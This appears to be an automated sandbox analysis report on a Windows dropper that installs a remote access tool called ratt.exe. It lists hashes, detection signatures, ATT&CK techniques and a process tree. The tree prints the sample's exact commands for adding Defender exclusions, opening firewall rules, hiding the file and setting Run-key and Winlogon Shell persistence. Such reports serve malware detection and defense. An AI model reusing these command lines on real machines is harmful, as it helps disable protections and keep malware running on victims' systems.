68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce

Analysis

max time kernel
122s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
01/08/2023, 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe
Size

1.4MB
MD5

641b6b7eb6f35796293d4f642d82c3a2
SHA1

1f5271f56b3d7ccd9b03f9b079af4df636a843bc
SHA256

68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce
SHA512

8184b27f79c7e34009b7cb9849cf0372edf39e15014be13b3eeeaa8b94fde95664db960e029bef796b9197f3f26bf73881cf5e9efc74257705718c586c8219c5
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion persistence upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
4976	netsh.exe
3236	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000800000002325c-233.dat	acprotect
behavioral1/files/0x000800000002325c-232.dat	acprotect

Executes dropped EXE 3 IoCs

pid	Process
2200	7z.exe
4788	ratt.exe
5096	ratt.exe

Loads dropped DLL 1 IoCs

pid	Process
2200	7z.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000800000002325f-229.dat	upx
behavioral1/files/0x000800000002325c-233.dat	upx
behavioral1/files/0x000800000002325c-232.dat	upx
behavioral1/memory/2200-231-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x000800000002325f-230.dat	upx
behavioral1/memory/2200-234-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/2200-237-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/2200-239-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/2200-242-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4516	PING.EXE
4228	PING.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4768	powershell.exe
4768	powershell.exe
968	powershell.exe
968	powershell.exe
4564	powershell.exe
4564	powershell.exe
2816	powershell.exe
2816	powershell.exe
1932	powershell.exe
1932	powershell.exe
3208	powershell.exe
3208	powershell.exe
4788	ratt.exe
4788	ratt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5084	WMIC.exe
Token: SeSecurityPrivilege	5084	WMIC.exe
Token: SeTakeOwnershipPrivilege	5084	WMIC.exe
Token: SeLoadDriverPrivilege	5084	WMIC.exe
Token: SeSystemProfilePrivilege	5084	WMIC.exe
Token: SeSystemtimePrivilege	5084	WMIC.exe
Token: SeProfSingleProcessPrivilege	5084	WMIC.exe
Token: SeIncBasePriorityPrivilege	5084	WMIC.exe
Token: SeCreatePagefilePrivilege	5084	WMIC.exe
Token: SeBackupPrivilege	5084	WMIC.exe
Token: SeRestorePrivilege	5084	WMIC.exe
Token: SeShutdownPrivilege	5084	WMIC.exe
Token: SeDebugPrivilege	5084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5084	WMIC.exe
Token: SeRemoteShutdownPrivilege	5084	WMIC.exe
Token: SeUndockPrivilege	5084	WMIC.exe
Token: SeManageVolumePrivilege	5084	WMIC.exe
Token: 33	5084	WMIC.exe
Token: 34	5084	WMIC.exe
Token: 35	5084	WMIC.exe
Token: 36	5084	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5084	WMIC.exe
Token: SeSecurityPrivilege	5084	WMIC.exe
Token: SeTakeOwnershipPrivilege	5084	WMIC.exe
Token: SeLoadDriverPrivilege	5084	WMIC.exe
Token: SeSystemProfilePrivilege	5084	WMIC.exe
Token: SeSystemtimePrivilege	5084	WMIC.exe
Token: SeProfSingleProcessPrivilege	5084	WMIC.exe
Token: SeIncBasePriorityPrivilege	5084	WMIC.exe
Token: SeCreatePagefilePrivilege	5084	WMIC.exe
Token: SeBackupPrivilege	5084	WMIC.exe
Token: SeRestorePrivilege	5084	WMIC.exe
Token: SeShutdownPrivilege	5084	WMIC.exe
Token: SeDebugPrivilege	5084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5084	WMIC.exe
Token: SeRemoteShutdownPrivilege	5084	WMIC.exe
Token: SeUndockPrivilege	5084	WMIC.exe
Token: SeManageVolumePrivilege	5084	WMIC.exe
Token: 33	5084	WMIC.exe
Token: 34	5084	WMIC.exe
Token: 35	5084	WMIC.exe
Token: 36	5084	WMIC.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeIncreaseQuotaPrivilege	4696	WMIC.exe
Token: SeSecurityPrivilege	4696	WMIC.exe
Token: SeTakeOwnershipPrivilege	4696	WMIC.exe
Token: SeLoadDriverPrivilege	4696	WMIC.exe
Token: SeSystemProfilePrivilege	4696	WMIC.exe
Token: SeSystemtimePrivilege	4696	WMIC.exe
Token: SeProfSingleProcessPrivilege	4696	WMIC.exe
Token: SeIncBasePriorityPrivilege	4696	WMIC.exe
Token: SeCreatePagefilePrivilege	4696	WMIC.exe
Token: SeBackupPrivilege	4696	WMIC.exe
Token: SeRestorePrivilege	4696	WMIC.exe
Token: SeShutdownPrivilege	4696	WMIC.exe
Token: SeDebugPrivilege	4696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4696	WMIC.exe
Token: SeRemoteShutdownPrivilege	4696	WMIC.exe
Token: SeUndockPrivilege	4696	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4908 wrote to memory of 3752	4908	68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe	86
PID 4908 wrote to memory of 3752	4908	68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe	86
PID 4908 wrote to memory of 3752	4908	68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe	86
PID 3752 wrote to memory of 4084	3752	cmd.exe	89
PID 3752 wrote to memory of 4084	3752	cmd.exe	89
PID 3752 wrote to memory of 4084	3752	cmd.exe	89
PID 4084 wrote to memory of 3180	4084	cmd.exe	90
PID 4084 wrote to memory of 3180	4084	cmd.exe	90
PID 4084 wrote to memory of 3180	4084	cmd.exe	90
PID 3752 wrote to memory of 2196	3752	cmd.exe	91
PID 3752 wrote to memory of 2196	3752	cmd.exe	91
PID 3752 wrote to memory of 2196	3752	cmd.exe	91
PID 2196 wrote to memory of 5084	2196	cmd.exe	92
PID 2196 wrote to memory of 5084	2196	cmd.exe	92
PID 2196 wrote to memory of 5084	2196	cmd.exe	92
PID 3752 wrote to memory of 4768	3752	cmd.exe	95
PID 3752 wrote to memory of 4768	3752	cmd.exe	95
PID 3752 wrote to memory of 4768	3752	cmd.exe	95
PID 3752 wrote to memory of 968	3752	cmd.exe	100
PID 3752 wrote to memory of 968	3752	cmd.exe	100
PID 3752 wrote to memory of 968	3752	cmd.exe	100
PID 3752 wrote to memory of 4564	3752	cmd.exe	102
PID 3752 wrote to memory of 4564	3752	cmd.exe	102
PID 3752 wrote to memory of 4564	3752	cmd.exe	102
PID 3752 wrote to memory of 2816	3752	cmd.exe	103
PID 3752 wrote to memory of 2816	3752	cmd.exe	103
PID 3752 wrote to memory of 2816	3752	cmd.exe	103
PID 3752 wrote to memory of 1932	3752	cmd.exe	105
PID 3752 wrote to memory of 1932	3752	cmd.exe	105
PID 3752 wrote to memory of 1932	3752	cmd.exe	105
PID 3752 wrote to memory of 2200	3752	cmd.exe	107
PID 3752 wrote to memory of 2200	3752	cmd.exe	107
PID 3752 wrote to memory of 2200	3752	cmd.exe	107
PID 3752 wrote to memory of 3208	3752	cmd.exe	110
PID 3752 wrote to memory of 3208	3752	cmd.exe	110
PID 3752 wrote to memory of 3208	3752	cmd.exe	110
PID 3208 wrote to memory of 4976	3208	powershell.exe	111
PID 3208 wrote to memory of 4976	3208	powershell.exe	111
PID 3208 wrote to memory of 4976	3208	powershell.exe	111
PID 3208 wrote to memory of 3236	3208	powershell.exe	112
PID 3208 wrote to memory of 3236	3208	powershell.exe	112
PID 3208 wrote to memory of 3236	3208	powershell.exe	112
PID 3208 wrote to memory of 4840	3208	powershell.exe	113
PID 3208 wrote to memory of 4840	3208	powershell.exe	113
PID 3208 wrote to memory of 4840	3208	powershell.exe	113
PID 4840 wrote to memory of 4696	4840	cmd.exe	114
PID 4840 wrote to memory of 4696	4840	cmd.exe	114
PID 4840 wrote to memory of 4696	4840	cmd.exe	114
PID 3208 wrote to memory of 4432	3208	powershell.exe	115
PID 3208 wrote to memory of 4432	3208	powershell.exe	115
PID 3208 wrote to memory of 4432	3208	powershell.exe	115
PID 4432 wrote to memory of 4580	4432	cmd.exe	116
PID 4432 wrote to memory of 4580	4432	cmd.exe	116
PID 4432 wrote to memory of 4580	4432	cmd.exe	116
PID 3208 wrote to memory of 4788	3208	powershell.exe	117
PID 3208 wrote to memory of 4788	3208	powershell.exe	117
PID 3208 wrote to memory of 4788	3208	powershell.exe	117
PID 3208 wrote to memory of 4636	3208	powershell.exe	118
PID 3208 wrote to memory of 4636	3208	powershell.exe	118
PID 3208 wrote to memory of 4636	3208	powershell.exe	118
PID 3752 wrote to memory of 3488	3752	cmd.exe	119
PID 3752 wrote to memory of 3488	3752	cmd.exe	119
PID 3752 wrote to memory of 3488	3752	cmd.exe	119
PID 3752 wrote to memory of 5096	3752	cmd.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4636	attrib.exe

C:\Users\Admin\AppData\Local\Temp\68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe
"C:\Users\Admin\AppData\Local\Temp\68c7aa7d67d97446859af8cd1c62af219514dc0874a1768dda77409552c8a5ce.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3208
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4976
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3236
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4840
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="BIHQJRXS" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4432
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:4580
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4788
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2744
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 6
        6⤵
        Runs ping.exe
        
        PID:4228
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:2524
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 14
        6⤵
        Runs ping.exe
        
        PID:4516
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:4636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    - Adds Run key to start application
    PID:3488
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    - Executes dropped EXE
    PID:5096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
577.8MB

MD5
3883a314216906413aece379373cdab7

SHA1
8c0c47ea4a51d93d8d2cba7f1127cbb060be2e71

SHA256
6271c22fd62b913f5af8c9372059b398d03b2eb7334f78cacd2ca3ff8060f22f

SHA512
ade0f4a5c9e3df182befca6958c395d0a56b72cb176cebe4a145d493a18e34b5b2a003b21c655a8f55da5ad4a09c9a021315ec9bc5805e00478f6c126f373e0b

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
215.3MB

MD5
76e2396aa558319a458abc662f3d1ed1

SHA1
97737be0474bb45796348d3bb4b5a88b29927d8f

SHA256
9afb86991fd7cdb65461f790c5a29ef0e79d0221c73f1cecc365247028d2c58e

SHA512
37ec5c2e482d2485b4c3e0e7c968f78f60c3c6e31167d0eadd14e579d17decb0f72f884b4745fd034b5ce4c24745cb36ba28ab312a6cb605a545177444d4ea7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
351715ae3dd19fedcc6bfe624a9ca21c

SHA1
3756bb6b40ad33f844f4d34ab70ccc1d5bc9a822

SHA256
79733ed9d083fe7c66ae8597e007172f87bcfd93a78fc7b9d35051a752161f47

SHA512
5f4dc0fbd6ee2d50ec099836e79a4f182b00b2aad2b331baece9bdcec1a9d4b705985b4e4861f9f1f79049d823476aacb0330f7ae1c5672b1b9fc208e399ce56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
86e8b247a0260f892c790441221bb0a2

SHA1
e427cf04b9ac87d0e305bd2c07a12b6467b89cf1

SHA256
1ea9b90c98e2f703effab82ef410023749a646029208fdad4666ecac011bb7a8

SHA512
4743acb74a77d51ac8e1fe1b5d86b7eee4a55270b814718212f845d5e6acf33186582963fa0a69759ccc13d045456d7204467939d472a8fa27e4a96237c97d90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
c47dbe4ab4c15f937e950ef0e8753b2a

SHA1
bee264d06ffcb641ed7462ba425153a6f4395c4c

SHA256
10417efad9738c7b6060037c9a8af219b4aa762305523170377fd7f9fb2ed866

SHA512
539fd9054871f73bd3856639a59b390ad1d9983403a554d8ece9e336c3c749a9be8ad9d6384d5fd5ca9918a0cb60a0d90c8c503e7b79351425360d46fafe217b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
1905d145812afd6d4579eddaaef145e5

SHA1
4b35b3a95818cba87cd96de377e8a1db8b8d92a6

SHA256
371e5cfbe6c203c1755f407be15509b098a2f7ea3b76389b9f9c7e24d6751716

SHA512
5162704273bb1d351d1528cced5adbd18e419ca4c0fbb1ad89ecc5b2b5526f261ee67ed0816cfa3c11bb3674ce2d09bedaa498c1798c4734f747d755dbf0e0cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
dd9679b90f902e292f66ac584c132502

SHA1
0555d39bf82067aebe9837daeb9340863e6dcc0e

SHA256
78115d54506f01463d974726fe0a697de9d8c57660efccbfb957e35218df56c5

SHA512
0609f1f0f2cf50f50fea02a088a7a7ac38a197a68997e24c194c114d862f13582436c54501c924093a8b7a6e6f2b69f4376da4af1ef044f7b52f0da9426dbfe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltlv3kvz.54i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
141.9MB

MD5
03a0e1056496058a038f15057d445f53

SHA1
a1915cfb7714105843346610237e1965017c72f0

SHA256
5183986c1d4121e87686949c1f9890205673ea46d6c5dc9332832a9093f5247a

SHA512
183303563593f1c63bd20570ead674794d8541af9767865737e6af1514d23474df3cc325ac72a2c4f74a428ae29e350176a45b9c36de4be2f512ddb4dea0581c

Download Submit
memory/968-181-0x0000000002F50000-0x0000000002F60000-memory.dmp

Filesize
64KB

Download
memory/968-183-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/968-175-0x0000000002F50000-0x0000000002F60000-memory.dmp

Filesize
64KB

Download
memory/968-169-0x0000000002F50000-0x0000000002F60000-memory.dmp

Filesize
64KB

Download
memory/968-168-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/1932-236-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/1932-215-0x0000000004950000-0x0000000004960000-memory.dmp

Filesize
64KB

Download
memory/1932-216-0x0000000004950000-0x0000000004960000-memory.dmp

Filesize
64KB

Download
memory/1932-214-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/2200-242-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2200-234-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/2200-237-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2200-239-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/2200-231-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2816-213-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/2816-212-0x0000000002530000-0x0000000002540000-memory.dmp

Filesize
64KB

Download
memory/2816-200-0x0000000002530000-0x0000000002540000-memory.dmp

Filesize
64KB

Download
memory/2816-198-0x0000000075370000-0x0000000075B20000-memory.dmp

Filesize
7.7MB

Download
memory/2816-199-0x0000000002530000-0x0000000002540000-memory.dmp

Filesize
64KB

Download
memory/3208-282-0x0000000007490000-0x000000000749E000-memory.dmp

Filesize
56KB

Download
memory/3208-260-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3208-281-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3208-280-0x0000000007510000-0x00000000075A6000-memory.dmp

Filesize
600KB

Download
memory/3208-295-0x00000000752A0000-0x0000000075A50000-memory.dmp

Filesize
7.7MB

Download
memory/3208-288-0x0000000008530000-0x0000000008AD4000-memory.dmp

Filesize
5.6MB

Download
memory/3208-287-0x0000000007620000-0x0000000007642000-memory.dmp

Filesize
136KB

Download
memory/3208-285-0x00000000074E0000-0x00000000074E8000-memory.dmp

Filesize
32KB

Download
memory/3208-246-0x00000000752A0000-0x0000000075A50000-memory.dmp

Filesize
7.7MB

Download
memory/3208-247-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3208-248-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
